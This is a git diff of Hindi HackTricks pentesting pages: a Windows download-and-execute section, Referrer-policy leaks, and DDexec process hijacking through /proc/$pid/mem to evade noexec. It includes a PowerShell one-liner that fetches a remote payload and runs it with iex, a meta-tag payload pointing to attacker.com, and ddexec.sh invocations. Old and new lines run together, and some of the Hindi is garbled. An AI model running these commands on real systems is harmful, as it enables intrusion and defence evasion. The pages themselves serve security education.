powershell -exec bypass -c "iwr('http://10.2.0.5/powershell_attack.txt')|iex" powershell -exec bypass -c "iwr('http://10.2.0.5/powershell_attack.txt')|iex"
``` ```
**खतरनाक कोड के रूप में पहचाना गया**
**मालिकाना कोड के रूप में पहचाना गया**
## अधिक ## अधिक
[PS>Attack](https://github.com/jaredhaight/PSAttack) PS कंसोल जिसमें कुछ आक्रामक PS मॉड्यूल पूर्वलोड हैं (साइफर्ड)\ [PS>Attack](https://github.com/jaredhaight/PSAttack) PS कंसोल जिसमें कुछ आक्रामक PS मॉड्यूल पूर्व-लोड हैं (साइफर्ड)\
[https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f9](https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f93c)[\ [https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f9](https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f93c)[\
WinPWN](https://github.com/SecureThisShit/WinPwn) PS कंसोल जिसमें कुछ आक्रामक PS मॉड्यूल और प्रॉक्सी पहचान है (IEX) WinPWN](https://github.com/SecureThisShit/WinPwn) PS कंसोल जिसमें कुछ आक्रामक PS मॉड्यूल और प्रॉक्सी पहचान है (IEX)
@ -556,22 +477,25 @@ WinPWN](https://github.com/SecureThisShit/WinPwn) PS कंसोल जिस
* [https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/](https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/) * [https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/](https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/)
* [https://www.hackingarticles.in/koadic-com-command-control-framework/](https://www.hackingarticles.in/koadic-com-command-control-framework/) * [https://www.hackingarticles.in/koadic-com-command-control-framework/](https://www.hackingarticles.in/koadic-com-command-control-framework/)
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md) * [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)
* [https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) **Try Hard Security Group** * [https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
**Try Hard Security Group**
<figure><img src="https://github.com/carlospolop/hacktricks/blob/in/generic-methodologies-and-resources/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
{% embed url="https://discord.gg/tryhardsecurity" %} {% embed url="https://discord.gg/tryhardsecurity" %}
{% hint style="success" %}
AWS हैकिंग सीखें और प्रैक्टिस करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP हैकिंग सीखें और प्रैक्टिस करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
Other ways to support HackTricks: * [**सदस्यता योजनाएँ**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में शामिल हों या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * **हैकिंग ट्रिक्स साझा करें, [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details> </details>
{% endhint %}

View file

@ -1,29 +1,29 @@
{% hint style="success" %}
सीखें और प्रैक्टिस करें AWS हैकिंग: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स** और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PRs सबमिट करके।
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** 🐦 पर **मुझे फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **अपनी हैकिंग ट्रिक्स साझा करें, HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके.
</details> </details>
{% endhint %}
# रेफरर हेडर्स और नीति
# Referrer headers और policy रेफरर वह हेडर है जिसका उपयोग ब्राउज़र्स द्वारा किया जाता है ताकि पहले दौरे गए पृष्ठ का पता लगाया जा सके।
Referrer वह header है जिसका उपयोग ब्राउज़र यह इंगित करने के लिए करते हैं कि पिछला पृष्ठ कौन सा था। ## संवेदनशील जानकारी लीक हो गई
## संवेदनशील जानकारी का लीक होना यदि किसी वेब पृष्ठ के अंदर किसी GET अनुरोध पैरामीटर पर कोई संवेदनशील जानकारी होती है, यदि पृष्ठ में बाहरी स्रोतों े लिंक होते हैं यएक हमावर को यह सुझाने या बनाने में सक्षम होता है (सामाजिक इंजनियरिंग) कि उपयोगकर्ता एक हमलावर द्वारा नियंत्रित URL पर जाएं। त वह संवेदशील जानकरी को नवीनतम GET अनुरोध के अंदर निकाल सकता है।
यदि किसी वेब पेज के अंदर किसी बिंदु पर कोई संवेदनशील जानकारी GET request पैरामीटर्स पर स्थित होती है, और यदि पेज में बाहरी स्रोतों के लिंक होते हैं या एक हमलावर उपयोगकर्ता को उस URL पर जाने के लिए मना सकता है (सामाजिक इंजीनियरिंग) जो हमलावर द्वारा नियंत्रित होता है। तो वह नवीनतम GET request के अंदर संवेदनशील जानकारी को बाहर निकालने में सक्षम हो सकता है। ## संशोधन
## निवारण आप ब्राउज़र को एक **रेफरर-नीति** का पालन करने के लिए कर सकते हैं जो संवेदनशील जानकारी को अन्य वेब एप्लिकेशनों को भेजने से **बचा** सकता है।
आप ब्राउज़र को एक **Referrer-policy** का पालन करने के लिए बना सकते हैं जो संवेदनशील जानकारी को अन्य वेब एप्लिकेशन्स को भेजे जाने से **रोक** सकता है:
``` ```
Referrer-Policy: no-referrer Referrer-Policy: no-referrer
Referrer-Policy: no-referrer-when-downgrade Referrer-Policy: no-referrer-when-downgrade
@ -34,28 +34,13 @@ Referrer-Policy: strict-origin
Referrer-Policy: strict-origin-when-cross-origin Referrer-Policy: strict-origin-when-cross-origin
Referrer-Policy: unsafe-url Referrer-Policy: unsafe-url
``` ```
## प्रतिरोध-निवारण ## काउंटर-मिटिगेशन
आप इस नियम को एक HTML मेटा टैग का उपयोग करके ओवरराइड कर सकते हैं (हमलावर को HTML इंजेक्शन का शोषण करने की आवश्यकता है): आप एक HTML मेटा टैग का उपयोग करके इस नियम को नष्ट कर सकते हैं (हमलावर को HTML इन्जेक्शन का शिकार होना चाहिए):
```markup ```markup
<meta name="referrer" content="unsafe-url"> <meta name="referrer" content="unsafe-url">
<img src="https://attacker.com"> <img src="https://attacker.com">
``` ```
## रक्षा ## रक्षा
URL में GET पैरामीटर्स या पथों के अंदर कभी भी संवेदनशील डेटा न रखें। कभी भी URL में GET पैरामीटर या पथ में कोई भी संवेदनशील डेटा न डालें।
<details>
<summary><strong> AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** 🐦 पर **मुझे फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें।
</details>

View file

@ -1,30 +1,31 @@
# DDexec / EverythingExec # DDexec / EverythingExec
{% hint style="success" %}
**AWS हैकिंग सीखें और प्रैक्टिस करें:** [**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
**GCP हैकिंग सीखें और प्रैक्टिस करें:** [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 पर **फॉलो** करें [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)! * **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details> </details>
{% endhint %}
## संदर्भ ## संदर्भ
Linux में किसी प्रोग्राम को चलाने के लिए यह एक फ़ाइल के रूप में मौजूद होना चाहिए, इसे किसी भी तरीके से फ़ाइल सिस्टम हाइरार्की के माध्यम से पहुंचना चाहिए (यह बस `execve()` कैसे काम करता है). यह फ़ाइल डिस्क पर हो सकती है या रैम में (tmpfs, memfd) लेकिन आपको एक फ़ाइलपथ की आवश्यकता है। यह बहुत आसान बना दिया है कि लिनक्स सिस्टम पर क्या चलाया जाता है, यह खतरों और हमले के उपकरणों को पहचानना आसान बनाता है या उन्हें किसी भी चीज़ को चलाने की कोशिश करने से रोकने के लिए (_जैसे_ अनधिकृत उपयोगकर्ताओं को कहीं भी निषेधित नहीं करने देना)। लिनक्स में किसी प्रोग्राम को चलाने के लिए यह एक फ़ाइल के रूप में मौजूद होना चाहिए, इसे किसी भी तरह से फ़ाइल सिस्टम हायरार्की के माध्यम से पहुंचना चाहिए (यह बस `execve()` कैसे काम करता है) यह फ़ाइल डिस्क पर हो सकती है या रैम में (tmpfs, memfd) लेकिन आपको एक फ़ाइलपथ की आवश्यकता है। यह लिनक्स सिस्टम पर चलाने के लिए बहुत आसान बना दिया है, यह खतरों और हमले के उपकरणों को पहचानना आसान बनाता है या उन्हें किसी भी चीज़ को चलाने की कोशिश करने से रोकने के लिए (_जैसे_ अनधिकृत उपयोगकर्ताओं को कहीं भी निष्पादनीय फ़ाइलें रखने की अनुमति न देना।)
लेकिन यह तकनीक इस सभी को बदलने के लिए यहाँ है। यदि आप जिस प्रक्रिया को चाहते हैं उसे शुरू नहीं कर सकते हैं... **तो आप एक पहले से मौजूद प्रक्रिया को हाइजैक कर सकत हैं**। लेकिन यह तकनीक इस सभी को बदलने के लिए यहाँ है। यदि आप जिस प्रक्रिया को शुरू नहीं कर सकते हैं... **तो आप एक पहले से मौजूद प्रक्रिया को हाइजैक करें**।
यह तकनीक आपको **सामान्य सुरक्षा तकनीकों जैसे कि केवल पढ़ने योग्य, noexec, फ़ाइल-नाम सफेद सूची, हैश सफेद सूची...** को छूने की अनुमति देती है। यह तकनीक आपको **सामान्य सुरक्षा तकनीकों जैसे कि केवल पढ़ने योग्य, noexec, फ़ाइल-नाम व्हाइटलिस्टिंग, हैश व्हाइटलिस्टिंग...** को छेड़ने की अनुमति देती है।
## Dependencies ## आवश्यकताएँ
अंतिम स्क्रिप्ट निम्नलिखित उपकरणों पर निर्भर करता है काम करने के लिए, वे आपके द्वारा हमला किए जा रहे सिस्टम में पहुंचने की आवश्यकता है (डिफ़ॉल्ट रूप से आप उन्हें हर जगह पाएंगे): अंतिम स्क्रिप्ट निम्नलिखित उपकरणों पर निर्भर करता है काम करने के लिए, वे उपकरण आपके द्वारा हमला किए जा रहे सिस्टम में पहुंचने की आवश्यकता है (डिफ़ॉल्ट रूप से आप उन्हें हर जगह पाएंगे):
``` ```
dd dd
bash | zsh | ash (busybox) bash | zsh | ash (busybox)
@ -40,42 +41,42 @@ base64
``` ```
## तकनीक ## तकनीक
यदि आप किसी प्रक्रिया की मेमोरी को विचारशील रूप से संशोधित कर सकते हैं तो आप इसे अधिकार में ले सकते हैं। इसका उपयोग किसी पहले से मौजूद प्रक्रिया को हाइजैक करने और उसे दूसरे कार्यक्रम से बदलने के लिए किया जा सकता है। हम इसे या तो `ptrace()` सिस्टेम कॉल का उपयोग करके (जिसके लिए आपको सिस्टम पर सिस्टम कॉल को निष्पादित करने की क्षमता होनी चाहिए या सिस्टम पर gdb उपलब्ध होना चाहिए) या, और भी दिलचस्पी से, `/proc/$pid/mem` में लिखकर प्राप्त कर सकते हैं। यदि आप किसी प्रक्रिया की मेमोरी को विचारशील रूप से संशोधित कर सकते हैं तो आप इसे अधिकार में ले सकते हैं। इसका उपयोग किसी पहले से मौजूद प्रक्रिया को हाइजैक करने और उसे दूसरे कार्यक्रम से बदलने के लिए किया जा सकता है। हम इसे या तो `ptrace()` सिस्टेम कॉल का उपयोग करके (जिसके लिए आपको सिस्टम पर सिस्टम कॉल को निष्पादित करने की क्षमता होनी चाहिए या सिस्टम पर gdb उपलब्ध होना चाहिए) या, और भी दिलचस्पीपूर्ण रूप से, `/proc/$pid/mem` में लिखकर प्राप्त कर सकते हैं।
फ़ाइल `/proc/$pid/mem` एक प्रक्रिया के पूरे पता अंतरिक्ष का एक-से-एक मैपिंग है (_जैसे_ `0x0000000000000000` से `0x7ffffffffffff000` तक x86-64 में)। इसका अर्थ है कि इस फ़ाइल से किसी ऑफसेट `x` पर पढ़ना या लिखना उसी तरह है जैसे कि वर्चुअल पते `x` पर सामग्री को पढ़ना या संशोधित करना। फ़ाइल `/proc/$pid/mem` एक प्रक्रिया के पूरे पता अंतरिक्ष का एक-से-एक मैपिंग है (_जैसे_ `0x0000000000000000` से `0x7ffffffffffff000` तक x86-64 में)। इसका अर्थ है कि इस फ़ाइल से किसी ऑफसेट `x` पर पढ़ना या लिखना उसी तरह है जैसे कि वर्चुअल पते `x` पर सामग्री को पढ़ना या संशोधित करना।
अब, हमें चार मूल समस्याओं का सामना करना होगा: अब, हमें चार मूल समस्याओं का सामना करना ह:
* सामान्य रूप से, केवल रूट और फ़ाइल के कार्यक्रम मालिक इसे संशोधित कर सकते हैं। * सामान्य रूप से, केवल रूट और फ़ाइल के कार्यक्रम मालिक इसे संशोधित कर सकते हैं।
* ASLR। * ASLR।
* यदि हम किसी प्रोग्राम के पते में मैप नहीं किए गए पते पर पढ़ने या लिखने की कोशिश करते हैं तो हमें एक I/O त्रुटि मिलेगी। * यदि हम किसी पते पर पढ़ने या लिखने की कोशिश करते हैं जो प्रोग्राम के पता अंतरिक्ष में मैप नहीं है तो हमें एक I/O त्रुटि मिलेगी।
इन समस्याओं के समाधान हैं जो, यद्यपि वे पूर्ण नहीं हैं, अच्छे हैं: इन समस्याओं के हल हैं जो, यद्यपि वे पूर्ण नहीं हैं, अच्छे हैं:
* अधिकांश शैल अनुवादकों को बच्चा प्रक्रियाओं द्वारा विरासत में लिए जाएंगे फ़ाइल डेस्क्रिप्टर्स का निर्माण करने की अनुमति देते हैं। हम एक फ़ाइल डेस्क्रिप्टर बना सकते हैं जो लिखने की अनुमति वाली शैल की `mem` फ़ाइल की ओर पॉइंट करता है... तो उन बच्चा प्रक्रियाएँ जो उस fd का उपयोग करती हैं वे शैल की मेमोरी को संशोधित कर सकेंगी। * अधिकांश शैल अनुवादकों को फ़ाइल डिस्क्रिप्टर्स का निर्माण करने की अनुमति देते हैं जो फिर बच्चा प्रक्रियाओं द्वारा विरासत में लिया जाएगा। हम एक फ़ाइल डिस्क्रिप्टर बना सकते हैं जो लिखने की अनुमति वाली शैल की `mem` फ़ाइल की ओर पॉइंट करता है... तो उन बच्चा प्रक्रियाएँ जो उस फ़ाइल डिस्क्रिप्टर का उपयोग करती हैं वे शैल की मेमोरी को संशोधित कर सकेंगी।
* ASLR एक समस्या ही नहीं है, हम शैल की `maps` फ़ाइल या प्रोसेस के पता अंतरिक्ष के बारे में जानकारी प्राप्त करने के लिए procfs से किसी भी अन्य को जांच सकते हैं। * ASLR एक समस्या भी नहीं है, हम शैल के `maps` फ़ाइल या प्रोसेस के पता अंतरिक्ष के बारे में जानकारी प्राप्त करने के लिए procfs से किसी भी अन्य को जांच सकते हैं।
* इसलिए हमें फ़ाइल पर `lseek()` करने की आवश्यकता है। शैल से यह नहीं किया जा सकता अगर केवल दुर्भाग्यपूर्ण `dd` का उपयोग किया जाता है * इसलिए हमें फ़ाइल पर `lseek()` करने की आवश्यकता है। शैल से यह नहीं किया जा सकता अगर केवल दुर्भाग्यपूर्ण `dd` का उपयोग किया जा
### अधिक विस्तार में ### अधिक विस्तार में
चरण साधारण हैं और इन्हें समझने के लिए किसी भी प्रकार की विशेषज्ञता की आवश्यकता नहीं है: चरण साधारण हैं और इन्हें समझने के लिए किसी भी प्रकार की विशेषज्ञता की आवश्यकता नहीं है:
* हमें वह बाइनरी जिसे हम चलाना चाहते हैं और लोडर का विश्लेषण करना होगा ताकि हम जान सकें कि वे कौन-कौन सी मैपिंग चाहते हैं। फिर एक "शैल"कोड बनाएं जो, सामान्य रूप से, `execve()` को हर कॉल पर कर्नल द्वारा किए जाने वाले विशेष कदमों को करेगा: * हमें वह बाइनरी जिसे हम चलाना चाहते हैं और लोडर को पार्स करना होगा ताकि हम जान सकें कि वे कौन-कौन सी मैपिंग चाहते हैं। फिर एक "शैल"कोड बनाएं जो, व्यापक रूप से, `execve()` को हर कॉल पर करने वाले कर्नेल के उसी कदमों को करेगा:
* उक्त मैपिंग बनाएं। * उक्त मैपिंग बनाएं।
* उनमें बाइनरी डालें। * उन्हें मेमोरी में पढ़ें।
* अनुमतियाँ सेट करें। * अनुमतियाँ सेट करें।
* अंत में प्रोग्राम के लिए ताकत देने वाले तर्कों के साथ स्टैक को प्रारंभ करें और सहायक वेक्टर (लोडर द्वारा आवश्यक) रखें। * अंत में प्रोग्राम के लिए ताकत देने के लिए स्टैक को आरंभ करें और सहायक वेक्टर (लोडर द्वारा आवश्यक) को रखें।
* लोडर में जाएं और उसे बाकी का काम करने दें (प्रोग्राम द्वारा आवश्यक पुस्तकालयों को लोड करना)। * लोडर में जाएं और उसे बाकी का काम करने दें (प्रोग्राम द्वारा आवश्यक पुस्तकालयों को लोड करना)।
* `syscall` फ़ाइल से प्रक्रिया जिस पते पर वापस आएगी उसे प्राप्त करें जिसे वह वर्तमान में निष्पादित कर रही है। * `syscall` फ़ाइल से प्राप्त करें कि प्रक्रिया जिस प्रक्रिया को वह सिस्टम कॉल निष्पादित कर रही है उसके बाद वापस लौटने का पता
* उस स्थान को अधिकारी बनाएं, जो कार्यक्रम द्वारा निष्पादित होगा, हमारे शैलकोड से (द्वारा `mem` हम अनलिखनीय पृष्ठों को संशोधित कर सकते हैं)। * उस स्थान को ओवरराइट करें, जो कार्यात्मक होगा, हमारे शैलकोड के साथ (द्वारा `mem` हम अनलिखनीय पृष्ठों को संशोधित कर सकते हैं)।
* प्रोसेस के stdin में उस प्रोग्राम को पास करें जिसे हम चलाना चाहते हैं (उस "शैल"कोड द्वारा `read()` किया जाएगा)। * प्रोसेस के stdin में चलाने के लिए हमारे पास जो प्रोग्राम है उसे पास करें (उस "शैल"कोड द्वारा `read()` किया जाएगा)।
* इस बिंदु पर लोडर को हमारे प्रोग्राम के लिए आवश्यक पुस्तकालयों को लोड करने और उसमें जाने के लिए है। * इस बिंदु पर लोडर को हमारे प्रोग्राम के लिए आवश्यक पुस्तकालयों को लोड करने और उसमें जाने के लिए है।
**टूल की जाँच करें** [**https://github.com/arget13/DDexec**](https://github.com/arget13/DDexec) **टूल की जाँच करें** [**https://github.com/arget13/DDexec**](https://github.com/arget13/DDexec)
## EverythingExec ## EverythingExec
`dd` के लिए केवल उद्देश्य के लिए उपयोग किए जाने वाले `lseek()` के लिए वर्तमान में डिफ़ॉल्ट कार्यक्रम हैं, उसके लिए `tail` जैसे कई विकल्प हैं जो `mem` फ़ाइल के माध्यम से `lseek()` करने के लिए उपयोग किए जाते हैं। उक्त विकल्प हैं: `dd` के लिए कई विकल्प हैं, जिनमें से एक, `tail`, वर्तमान मेम फ़ाइल के माध्यम से `lseek()` के लिए डिफ़ॉल्ट कार्यक्रम है (जिसका उपयोग करने के लिए `dd` का उपयोग किया जाता था)। उक्त विकल्प हैं:
```bash ```bash
tail tail
hexdump hexdump
@ -86,23 +87,24 @@ xxd
```bash ```bash
SEEKER=cmp bash ddexec.sh ls -l <<< $(base64 -w0 /bin/ls) SEEKER=cmp bash ddexec.sh ls -l <<< $(base64 -w0 /bin/ls)
``` ```
यदि आप स्क्रिप्ट में अन्य एक मान्य सीकर खोजते हैं जो कि अंमल में नहीं है, तो आप `SEEKER_ARGS` वेरिएबल को सेट करके इस्तेमाल कर सकते हैं: यदि आप स्क्रिप्ट में अन्य एक मान्य सीकर निर्मित नहीं करते हैं, तो आप इसे अभी भी उपयोग कर सकते हैं `SEEKER_ARGS` चर को सेट करके:
```bash ```bash
SEEKER=xxd SEEKER_ARGS='-s $offset' zsh ddexec.sh ls -l <<< $(base64 -w0 /bin/ls) SEEKER=xxd SEEKER_ARGS='-s $offset' zsh ddexec.sh ls -l <<< $(base64 -w0 /bin/ls)
``` ```
## संदर्भ ## संदर्भ
* [https://github.com/arget13/DDexec](https://github.com/arget13/DDexec) * [https://github.com/arget13/DDexec](https://github.com/arget13/DDexec)
{% hint style="success" %}
AWS हैकिंग सीखें और अभ्यास करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर हमें **फॉलो** करें।
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)! * **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें** द्वारा PRs सबमिट करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details> </details>
{% endhint %}

View file

@ -1,22 +1,23 @@
# लिनक्स पोस्ट-एक्सप्लोइटेशन # लिनक्स पोस्ट-एक्सप्लोइटेशन
{% hint style="success" %}
AWS हैकिंग सीखें और प्रैक्टिस करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
